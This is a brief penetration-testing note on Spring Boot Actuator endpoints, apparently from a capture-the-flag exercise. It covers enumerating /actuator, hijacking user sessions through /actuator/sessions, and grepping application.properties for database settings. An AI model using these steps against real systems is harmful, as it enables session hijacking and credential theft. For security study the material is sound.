Spring Boot Actuators

cozyhosting spring-actuators

Spring Boot Actuators are a Spring Boot module to monitor and manage applications. Sprint Boot applications can be deployed to multiple servers such as Apache Tomcat.

It's commonly exposed at the /actuator endpoint. Querying this endpoint will return a list all available endpoints.

Most endpoints are returning censored data.

  • /actuator/mappings: can be used to find URI
  • /actuator/env: censored configuration data
  • ...

The /actuator/sessions is returning existing sessions. We can use it to steal another user session.

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • See also: JAR Reverse Engineering
  • /beans.xml (Spring configuration metadata)
  • cat BOOT-INF/classes/application.properties | grep datasource
  • We can easily recognize spring from the 404 page (Whitelabel error page or format)
  • /actuators is for v2, in v1 they are at the root and not censored while there is no database configuration